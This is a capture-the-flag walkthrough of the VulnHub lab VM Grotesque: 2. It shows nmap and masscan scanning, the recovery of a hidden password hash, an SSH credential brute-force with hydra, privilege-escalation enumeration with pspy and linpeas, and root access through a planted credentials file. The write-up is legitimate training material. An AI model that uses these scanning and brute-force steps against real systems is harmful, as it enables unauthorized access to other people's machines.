Target description
Target URL: https://www.vulnhub.com/entry/grotesque-2,673/
Description
get flags
difficulty: medium
about vm: do not touch ram allocation. vm needs 4gb of ram. tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.
This works better with VirtualBox rather than VMware
1. Setting up the target environment
Attacker: Kali, IP address 192.168.9.3
Target: IP address 192.168.9.10
The target environment is set up as follows:
- Import the downloaded VM into VirtualBox and set its network adapter to Host-Only mode
- In VMware, point the bridged-mode network adapter at VirtualBox's Host-only adapter
2. Walkthrough
2.1 Network scan
2.1.1 Start the target and Kali, then scan for it
Method one: arp-scan -I eth0 -l (scan on the specified interface)
arp-scan -I eth0 -l
Method two: masscan <network to scan> -p <ports to scan>
masscan 192.168.184.0/24 -p 80,22
Method three: netdiscover -i <interface> -r <network>
netdiscover -i eth0 -r 192.168.184.0/24
Method four: left for you to fill in
2.1.2 Check the target's open ports
Use nmap -A -sV -T4 -p- <target IP> to check the target's open ports.
That option set suits hosts with only a few open ports, where you want detailed information on each of them.
Run nmap -A -sV -T4 -p- -oN namp.txt 192.168.9.10 and let it run in the background first, because the target has far too many open ports.
Meanwhile, do a quick first pass with nmap -sT 192.168.9.10:
⬢ Grotesque: 2 nmap -sT 192.168.9.10
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-02 17:50 CST
Nmap scan report for bogon (192.168.9.10)
Host is up (0.0013s latency).
Not shown: 921 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
32/tcp open unknown
33/tcp open dsp
37/tcp open time
42/tcp open nameserver
43/tcp open whois
49/tcp open tacacs
53/tcp open domain
70/tcp open gopher
79/tcp open finger
80/tcp open http
81/tcp open hosts2-ns
82/tcp open xfer
83/tcp open mit-ml-dev
84/tcp open ctf
85/tcp open mit-ml-dev
88/tcp open kerberos-sec
89/tcp open su-mit-tg
90/tcp open dnsix
99/tcp open metagram
100/tcp open newacct
106/tcp open pop3pw
109/tcp open pop2
110/tcp open pop3
111/tcp open rpcbind
113/tcp open ident
119/tcp open nntp
125/tcp open locus-map
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
144/tcp open news
146/tcp open iso-tp0
161/tcp open snmp
163/tcp open cmip-man
179/tcp open bgp
199/tcp open smux
211/tcp open 914c-g
212/tcp open anet
222/tcp open rsh-spx
254/tcp open unknown
255/tcp open unknown
256/tcp open fw1-secureremote
259/tcp open esro-gen
264/tcp open bgmp
280/tcp open http-mgmt
301/tcp open unknown
306/tcp open unknown
311/tcp open asip-webadmin
340/tcp open unknown
366/tcp open odmr
389/tcp open ldap
406/tcp open imsp
407/tcp open timbuktu
416/tcp open silverplatter
417/tcp open onmux
425/tcp open icad-el
427/tcp open svrloc
443/tcp open https
444/tcp open snpp
445/tcp open microsoft-ds
458/tcp open appleqtc
464/tcp open kpasswd5
465/tcp open smtps
481/tcp open dvs
497/tcp open retrospect
500/tcp open isakmp
512/tcp open exec
513/tcp open login
514/tcp open shell
515/tcp open printer
524/tcp open ncp
541/tcp open uucp-rlogin
543/tcp open klogin
544/tcp open kshell
545/tcp open ekshell
548/tcp open afp
554/tcp open rtsp
555/tcp open dsf
MAC Address: 08:00:27:E7:87:C3 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.49
That is a huge number of open ports, and each one maps to a different service name.
After a while the full scan finished:
# Nmap 7.92 scan initiated Mon May 2 17:45:06 2022 as: nmap -A -sV -T4 -p- -oN namp.txt 192.168.9.10
Nmap scan report for bogon (192.168.9.10)
Host is up (0.00062s latency).
Not shown: 65009 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
31/tcp open http PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
32/tcp open http PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
... (identical entries omitted) ...
80/tcp open http PHP cli server 5.5 or later
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_auth-owners: ERROR: Script execution failed (use -d to debug)
81/tcp open http PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
... (identical entries omitted) ...
555/tcp open http PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:E7:87:C3 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms bogon (192.168.9.10)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 2 17:56:12 2022 -- 1 IP address (1 host up) scanned in 665.77 seconds
As you can see, almost all of them are HTTP.
2.2 Enumerating vulnerabilities
2.2.1 Port 80 analysis
With so many open ports, we start as usual with port 80: http://192.168.9.10/
The page source has nothing either, so scan for directories:
⬢ Grotesque: 2 gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.9.10 -x php,html,txt,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.10
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,txt,zip,bak,php
[+] Timeout: 10s
===============================================================
2022/05/02 17:54:55 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.9.10/74c31a13-d670-419d-ab99-a39422881851 => 200 (Length: 412). To continue please exclude the status code, the length or use the --wildcard switch
⬢ Grotesque: 2
Clearly, the entry point is not here.
2.2.2 All-port analysis
According to the nmap results, all the later ports are HTTP.
Visiting a few of them at random, every page looks the same.
I decided to use wget to download all of these pages and check whether the files differ:
for i in {23..600};do wget 192.168.9.10:$i -O index$i;done
Once the download finishes, run ls -al | sort to order the files by size.
Except for port 258, which is 762 bytes, every page is 412 bytes.
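The size comparison above generalises to a content fingerprint: the following script, an added example that is not from the original write-up, groups the saved index<port> files by cksum (CRC plus byte count) and reports the ports whose page differs from the majority, so a page that differs in content but happens to have the same size is caught too. It assumes files named index<port> as produced by the wget loop; the sample pages it creates are constructed stand-ins, not real target output.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): group the saved index<port>
# files by a content fingerprint and report the ports whose body differs from
# the majority. Assumes files named index<port>, as produced by the wget loop;
# the sample pages below are constructed, not real target output.
set -eu

# Constructed sample data: five identical placeholder pages and one that differs.
make_sample_pages() {
  local dir="$1"
  mkdir -p "$dir"
  for p in 23 24 80 81 555; do
    printf '<html><body>placeholder</body></html>\n' > "$dir/index$p"
  done
  printf '<html><body>atan raphael angel distress greed lust</body></html>\n' \
    > "$dir/index258"
}

# Fingerprint = "<crc>-<bytes>" from cksum, so two pages of equal size but
# different content are still told apart (sorting on size alone would not).
fingerprint() {
  cksum < "$1" | awk '{print $1 "-" $2}'
}

# Print, one per line in ascending order, the ports whose fingerprint is not
# the most frequent one in the directory (the most frequent is the default page).
find_outlier_ports() {
  local dir="$1" table common
  table=$(for f in "$dir"/index*; do
            printf '%s %s\n' "$(fingerprint "$f")" "${f##*/index}"
          done)
  common=$(printf '%s\n' "$table" | awk '{print $1}' | sort | uniq -c \
           | sort -rn | awk 'NR == 1 {print $2}')
  printf '%s\n' "$table" | awk -v c="$common" '$1 != c {print $2}' | sort -n
}

main() {
  local tmp
  tmp=$(mktemp -d)
  make_sample_pages "$tmp"
  echo "ports whose page differs from the default:"
  find_outlier_ports "$tmp"
  rm -rf "$tmp"
}

main
```

Run it against the real download directory by calling find_outlier_ports on that directory instead of the constructed sample.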
2.2.3 Port 258 analysis
Visit http://192.168.9.10:258/
It lists several SSH usernames:
atan, raphael, angel, distress, greed, lust
That pretty much confirms an SSH password brute-force is intended, but how do we build the wordlist?
Then I noticed that the image on the second line can be opened.
Its colour is slightly off; zooming in reveals a hash string.
At normal size it is very blurry; enlarged it is much clearer: b6e705ea1249e2bb7b01d7dac91cd0b3
Use CrackStation to crack it.
The resulting password is solomon1.
Create the wordlist users.txt:
atan
raphael
angel
distress
greed
lust
Use hydra to brute-force: hydra -L users.txt -p solomon1 ssh://192.168.9.10 -f
⬢ Grotesque: 2 hydra -L users.txt -p solomon1 ssh://192.168.9.10 -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-02 18:51:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.9.10:22/
[22][ssh] host: 192.168.9.10 login: angel password: solomon1
[STATUS] attack finished for 192.168.9.10 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-02 18:51:25
Successfully found the credentials angel / solomon1.
Try logging in:
⬢ Grotesque: 2 ssh angel@192.168.9.10
The authenticity of host '192.168.9.10 (192.168.9.10)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.10' (ED25519) to the list of known hosts.
angel@192.168.9.10's password:
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
angel@grotesque:~$
2.3 Exploitation
None
2.4 Privilege escalation
2.4.1 Information gathering
Look at what is in the current directory:
angel@grotesque:~$ ls -al
total 52
drwxr-xr-x 4 angel angel 4096 Mar 27 2021 .
drwxr-xr-x 3 root root 4096 Mar 27 2021 ..
drwxr-xr-x 2 angel angel 36864 Mar 27 2021 quiet
drwx------ 2 angel angel 4096 Mar 27 2021 .ssh
-r-x------ 1 angel angel 1805 Jan 3 2021 user.txt
angel@grotesque:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
angel@grotesque:~$
Got flag 1, and also noticed a new directory, quiet.
Looking at what is in quiet, it is not clear what these files are.
Upload pspy64 to see what scheduled tasks are running.
I used FileZilla here, though wget or similar would do as well.
Make it executable and run it:
chmod 777 pspy64
./pspy64
It shows the scripts write.sh and check.sh running at fixed intervals.
We currently have no permission to read their contents:
angel@grotesque:/tmp$ cat /root/check.sh
cat: /root/check.sh: Permission denied
angel@grotesque:/tmp$ cat /root/write.sh
cat: /root/write.sh: Permission denied
angel@grotesque:/tmp$
Earlier we saw that the /home/angel/quiet folder contains some odd files; are they what these scripts write?
Try deleting all the files in it and see what happens.
After the two scripts run, the files are created again in the quiet folder, all identical.
Hmm... upload linpeas.sh as well and have a look.
It reports a file modified in the last 5 minutes under the / root directory: rootcreds.txt.
Check its contents:
angel@grotesque:/tmp$ cd /
angel@grotesque:/$ ls
bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root rootcreds.txt run sbin srv sys tmp usr var vmlinuz vmlinuz.old
angel@grotesque:/$ cat root
root/ rootcreds.txt
angel@grotesque:/$ cat rootcreds.txt
root creds
root
sweetchild
root creds
root
sweetchild
angel@grotesque:
This should be the password.
Try switching to root:
angel@grotesque:/$ su root
Password:
root@grotesque:/# cd /root
root@grotesque:~# ls
check.sh logdel2 real real.sh root.txt test upit2.sh upit.sh write.sh
root@grotesque:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@grotesque:~#
Got flag 2.
Now let's look back at check.sh and write.sh:
root@grotesque:~# cat check.sh
#!/bin/bash
cd /home/angel/quiet
if [[ $(ls) == "" ]]; then
echo "root creds" >> /rootcreds.txt
echo "" >> /rootcreds.txt
echo "root" >> /rootcreds.txt
echo "sweetchild" >> /rootcreds.txt
chmod 777 /rootcreds.txt
fi
root@grotesque:~# cat write.sh
#!/bin/bash
cd /home/angel/quiet
for i in {1..2323}; do echo "quiet" >> $i; done
root@grotesque:~#
When check.sh runs, it executes ls in /home/angel/quiet; if the directory is empty, it writes the root creds into a file named rootcreds.txt under the / directory and gives that file read, write and execute permission for everyone.
write.sh creates files named 1 through 2323 and writes quiet into every one of them.
Summary
Another quite interesting box.
- Information gathering
- Brute-forcing SSH with hydra